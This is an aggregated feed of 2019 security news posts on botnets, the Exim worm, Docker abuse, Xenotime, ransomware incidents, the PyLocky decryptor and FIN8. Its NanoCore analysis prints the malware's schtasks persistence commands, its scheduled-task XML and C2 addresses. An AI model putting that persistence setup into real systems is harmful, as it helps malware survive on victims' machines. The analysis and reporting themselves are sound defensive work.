The experts pointed out that was not simple to determine the vulnerabilities that were being exploited by the botnet because some of them had no CVE numbers assigned.  

After the contacted MITRE, the organizations assigned them identification numbers.

Below the list of the exploits included in the Echobot variant discovered by the expert, some of the flaws triggered by the bot are decade-old vulnerabilities:


The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect the larger number of systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that already compromised some Azure installs.

Bad actors continue to target cloud services in the attempt of abusing them for several malicious purposes, like storing malware or implementing command and control servers.

Microsoft Azure is not immune, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

Researchers already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that already compromised some Azure installs.

Recently security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. Different groups of hackers are exploiting the CVE-2019-10149 flaw to take over them.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

Exim CVE-2019-10149

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The flaw could lead to remote code execution with root privileges on the mail server, unfortunately, the vulnerability is easily exploitable by a local and a remote attacker in certain non-default configurations

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February, but a large number of operating systems are still affected by the flaw.

CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Microsoft has now detected a Linux worm that leverages the above flaw in vulnerable Linux Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this Linux worm, but warns customers of using up to date software to prevent the infection. 

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)

The post Linux worm spreading via Exim servers hit Azure customers appeared first on Security Affairs.

Modular Malware In The Nutshell

We are in the age of computing where programs are growing to a point towards feature-richness at best and bloatware at worst. Malware itself is also software, developers creating malware also have access to the same development environment as any other developers of legal software. They also realized that their malware was also starting to become bloatware, as they build more and more features just for the purpose of bypassing antimalware products. And we should not start the discussion about how the antimalware industry kept on producing bloated antivirus and Endpoint products for the last ten years.

The larger the malware, the easier it gets detected by both antivirus products and even through keen observation of highly experienced system administrators. So what did they do? Divide their big malware to smaller chunks, with the main module containing “calls” that enable it to download a certain sub-module which performs other tasks for the malware. Here in, we have covered since last year about VPNFilter, a malware that resides both on Windows machines and the user’s home routers’ firmware.

VPNFilter survives from the checks of the antivirus software since it has the capability to export a part of itself, a submodule to the home router. Ten years ago, such capability for malware was just science-fiction. The need for their malware to survive, such capability needs to be developed. Years ago, there were cases malware tried to hide itself in the BIOS firmware of the computer and the video cards. Malware authors cannot do it again, as the BIOS gave way to today’s UEFI (Unified Extensible Firmware Interface) which implements stricter checks with writes to its firmware area.

Typical recommendations such as rebooting the router will reduce VPNFilter its staged modular approach makes it difficult for any router to remain uninfected, however. Until such time that the source PC is removed from the network, the router with flawed firmware will continue to get infected by the same malware. Even resetting the router will not do any good, as long as the source of infection remains online. What VPNFiIter started continued as the start of 2019 marks the detection and identification of 150,000 modular malware in the wild.

Security researchers are expecting more modular type of malware in the coming months and years to come. The good news is due to the need to download sub-modules from the command and control (C&C) servers, authorities can shutdown the physical servers for good. That will make modular malware a short-lived creation, well that is what we are hoping for. However, the world is more surprising than what meets the eye, malware development does not happen in isolation. New malware, in fact thousands new variants are developed every single day. It will be impractical to replicate the FBI’s success over shutting down the C&C of all modular malware that will be discovered.

What are the practical ways to somehow lessen the chance of contacting a modular malware? Practical answer is to practice safe computing practices:

  1. Be doubtful of pop-ups, pop-unders and website redirectors. These misdemeanors are what Google itself is trying to stop by building a new feature in Chromium-based browsers to auto-block those actions by any website. A well-behaved site will not use pop-ups, pop-unders and website redirectors.
  2. Never neglect firmware updates for your home router, operating system and any Internet-facing apps. These updates include necessary and critical patches that prevents security vulnerabilities from being exploited.
  3. Never ignore establishing a credible backup habit. This can be a network shared drive, a NAS box or even the cloud. It is also strongly recommended encrypting the files first locally before uploading them to minimize damage when the cloud provider gets hacked at any point.
  4. Establish a reliable SNMP system which can monitor ports and external IP address communication of the network to the public Internet. It is very costly for an organization to establish a reliable SNMP, but it needs to be done, it is an investment worth spending for. It is much better to spend for security than spending for damage control after a cyber attack incident.

The post Modular Malware In The Nutshell appeared first on .

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

“Human Error” Is The Biggest Corporate IT Issue

Here in, we feature stories of virus infection, phishing incidents and other issues involving private and public sectors because of external risks. However, IT troubles in companies are not really made by outsiders, but human error inside the organization. It is necessary to think about how employees really think about the notion of “do not leak information”, “don’t do this”, “don’t do that”. Too many rules to a point that people in the organization forget some of them, potentially doing something with the nasty result. It is not a walk-in-the-park for any company can recover from a very bad “human error”.

Below are types of human errors:

1. Human Error in Management

It may be difficult to understand what it means to say “management error”, examples are:

  • Lost of personal information after moving.
  • The confirmation of delivery of personal information is insufficient, and the personal information that should have been received is lost
  • Disclosure of information, management rules have not been clarified and have been disclosed by mistake

Even though there are information management rules and security policies in a company, management has not been done according to those rules. Or there is a possibility that such a rule has not been decided at all. This indicates that it is important for employees to undergo security education etc. thoroughly, and that management procedures regarding company information including personal information are important.

2. Misoperation

This is true for both emails and faxes. Entering wrong addresses, wrong content, wrong attachment, etc. This is one of the most common of all human errors. It is necessary to thoroughly educate employees on security so as not to make such mistakes.

3. Unauthorized access

Although the rate is low compared to mismanagement and mis-operation, external unauthorized access via the Internet is continuously performed, and its attack methods are also evolving. Since this is often accompanied by attacks such as malware, it is important to be careful as it leads to the stealing of a lot of personal information if it is damaged. Basic security measures such as install anti-virus software are important but not absolute measures against unauthorized access.

4. Lost and misplaced

It is a case that brings out information equipment such as a personal computer outside the work area, including the data it contains or it is lost/misplaced. Nowadays, tablet PCs and smartphones contain a lot of information, so it requires careful handling. It seems that it is frequent to get drunk and to leave it, but it is the worst thing. Because this lost/forgotten occurs at a high rate, it is necessary to take measures such as establishing strict rules for taking out data.

5. Unauthorized takeout and theft

To raise awareness for those who handle information. Implement a mechanism that can not be easily taken out by the information system, and that it can not be used even when taken out. This is based on the idea that access to information and security precautions should be addressed by both the person who uses it, the system that handles it, both are usually not enough in a typical organization.

Practical ways to prevent IT issues caused by “human errors”:

  • Information learned from the firm, should remain in the firm.Do not bring out information assets of companies or organizations outside. Specifically, take your laptop computer, USB memory, etc. home without permission. If permission is provided, make sure the storage devices are encrypted. This will prevent information leakage in the event that the laptop or storage device is lost.
  • Do not leave important documents on the desk, likewise never write critical information on post-it notes and never paste it on the monitor.
  • Do not leave the computer without locking the screen
  • Do not discard information assets easily without measures. Be sure to erase etc. Specifically, when discarding a PC, be sure to delete the data on the hard disk if not physically destroy the disk.
  • Do not inadvertently bring private equipment (PCs etc.) into the company, unless BYOD is allowed.
  • Lock and No Loan – Do not lend or transfer the rights given to an individual to others without permission
  • Prohibition of information – Do not profess the information you have learned on business without permission.

The post “Human Error” Is The Biggest Corporate IT Issue appeared first on .

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver a malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware is active since at least since 2014 and it was used to build large DDoS botnet. in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and send it back to the C2, depending on the specific hardware configuration the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacker, mining cryptocurrency, etc.)

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts admins should allow only trusted sources to access the Docker API, below some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”

Pierluigi Paganini

(SecurityAffairs – containers, hacking)

The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware  (aka Trisis) was discovered by researchers at FireEye, it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), that is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014, its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Triton Xenotime

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed into breaching the targeted organization.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that uses ICS-SCADA systems similar to the ones in the oil and gas industries.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the experts.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta, below the video of the presentation:

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Cyber News Rundown: Radiohead Hit by Ransomware Hack

Reading Time: ~ 2 min.

Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

The account information was leaked for over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming related. The breach, which took place in April of 2018, affected 1.1 million IP and email addresses, many of which were found in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user data it’s clear EmuParadise could have done more to properly secure their users information.

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the pyLocky Ransomware versions 1 and 2, French authorities have released the pyLocky decryptor to decrypt the files for free.

French authorities have released a decryptor for pyLocky Ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology, and Systems Service, along with independent and volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is a result of a collaborative Among the agencies of the french Ministry of Interior, Including the first Brigade of fraud investigations in information technology  (BEFTI) of the Regional Directorate of the Judicial Police of Paris , on the of technical elements gathered during its investigations and collaboration with volunteer researchers.” reads the post published by the French Ministry of Interior states it is more active in Europe.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST (SI) ², part of the National Gendarmerie , to create that software.”

French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses, associations.

The pyLocky decryptor allows to decrypt file for version 1 (filenames having the .lockedfile or .lockymap extensions) and version 2 ( extensions .locky).

pyLocky Decryptor

The pyLocky Decryptor could be downloaded from the following link:

The decryptor has as pre-requisite the installation of the Java Runtime.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of 2 hardcoded private RSA keys that were likely obtained by French police from the access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)

The post French authorities released the PyLocky decryptor for versions 1 and 2 appeared first on Security Affairs.

Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of Nanocore Remote Administrator Tools (RAT) using a Delphi wrapper to protect its code.


Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the Luxury sector. For instance, we intercepted malicious email claiming to come from a well known Italian Bank and then we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with Adobe Acrobat icon. Trivial trick used to lure ingenuous users to believe that it is a legit PDF file. However, it contains a PE executable:

ThreatNanocore RAT wrapper
Brief DescriptionDelphi Language Wrapper for Nanocore RAT

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with “BobSoft Mini Delphi” compiler and two characteristics are significant: the first one is the high level of entropy, this leads us to think that the sample was somehow packed; the second one is the absolutely fake compilation timestamp of the executable.

Executing the malware, we notice the presence of some checks performed by the malware in order to evade analysis boxes.

Figure 3: Processes checked by malware

In the above figure, are shown some processes checked by the malware. This action is performed through the usage of the classical Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If no one of the checked processes is active, the malware can proceed with the real infection: it writes the real payload of Nanocore RAT in the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

The interesting thing is the payload, that is further loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has got a lot of embedded resources (as visible on the left), and one of them contains the entire Nanocore RAT payload. On the right, there is a diff analysis of the resource named “2035” and the actual payload triggered on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, on the left upper corner), which contains the name of the payload to implant on the machine “non.exe”. The succeeding piece of code is identical, without any protection. The “trasferimento.exe” component runs a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates a xml file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawn itself through the following command lines.

schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp”schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp”

The body of the xml configuration file is the following:

<?xml version=”1.0″ encoding=”UTF-16″?><Task version=”1.2″ xmlns=””>  <RegistrationInfo />  <Triggers />  <Principals>    <Principal id=”Author”>      <LogonType>InteractiveToken</LogonType>      <RunLevel>HighestAvailable</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>    <AllowHardTerminate>true</AllowHardTerminate>    <StartWhenAvailable>false</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>false</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>4</Priority>  </Settings>  <Actions Context=”Author”>    <Exec>      <Command>”C:\Users\admin\Desktop\trasferimento.exe”</Command>      <Arguments>$(Arg0)</Arguments>    </Exec>  </Actions></Task>

The difference between the two scheduled tasks is the fact that one references “trasferimento.exe” process and the other one references “non.exe” process. It seems to be a sort of a survival mechanism in which both the processes work and keep the infection alive.

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31.[50)  was down and the other one (79.134.225[.41) continues to work.

Figure 9: Communication with two different C2

NanoCore Client

ThreatNanocore RAT
Brief DescriptionNanoCore RAT client

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start to analyze the “non.exe” file which is the Nanocore RAT Client, even this one is compiled in .NET language.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after few steps of debugging, we extracted also the current version:, as highlighted in the red square. Going ahead with debugging, we found  a recurrent routine used to decrypt RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, also this one leverages encrypted configuration only decrypted during the malware execution. Interestingly, the extracted configuration does not include persistence, which is however guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting enabled features, like the capability to bypass the UAC control, or prevent the system to go to sleep. Moreover, the primary and backup C2 are the same and the solution of the backup C2 is guaranteed through the other “trasferimento.exe” RAT mode process.


Nowadays a lot of cyber criminals don’t strive to write malware from scratch because there already are a vastity of public tools suitable for this need. From the attacker point of view, the problem about the usage of these tools is the fact they sooner or later will be recognized by the Anti-Virus engines.

Therefore, attackers adopt other technologies like packers and obfuscators, many time publicly available too, or write down custom loaders to hide their espionage tools, keeping them running into victim machines for a long time, silently observing their targets and awaiting the right time to act their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)

The post Dissecting NanoCore Crimeware Attack Chain appeared first on Security Affairs.

Ransomware paralyzed production for at least a week at ASCO factories

Malware infections could be devastating for production environments, a ransomware infection halts production operations for days at airplane parts manufacturer ASCO.

ASCO, is of the world’s largest manufacturers of aerospace components

The company has offices and production plants in Belgium, Canada, Germany the US, Brasil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed the production in ASCO plants across several countries worldwide. The attack reportedly started on Friday and at the time of writing the current extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1400 were sent home for the entire week, on paid leave.


As a result of having IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately after ASCO also shut down for precaution production factories in Germany, Canada, and the US.

At the time is not clear if the company decided to pay the ransom to restore its systems rapidly or simply restore its backups.

Despite ASCO should be a privileged target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a targe”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)

The post Ransomware paralyzed production for at least a week at ASCO factories appeared first on Security Affairs.

Smart home security devices most at risk in IoT-targeted cyber attacks

Smart home security cameras equate to 47% of the most vulnerable devices followed by smart hubs such as Googlehome, Amazon Alexa, with the top countries executing attacks coming from China followed by USA, according to SAM Seamless Networks. Other findings reveal the USA and China are the foremost countries for both executing attacks and being targeted. The average home receives five attempted attacks per device per day via smart networks. Email malware and phishing are … More

The post Smart home security devices most at risk in IoT-targeted cyber attacks appeared first on Help Net Security.

FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years later after the last report, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers Root9b in June 2017, the malware was used by threat actors to deliver the PoC malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in the attempt of delivering PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separated.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

The ShellTea attempt to evade detection by checking the presence of virtualized environments and standard analysis tools. The malicious code uses a hacking algorithm for most of its functions, the algorithm is similar to the one implemented for previous ShellTea version.

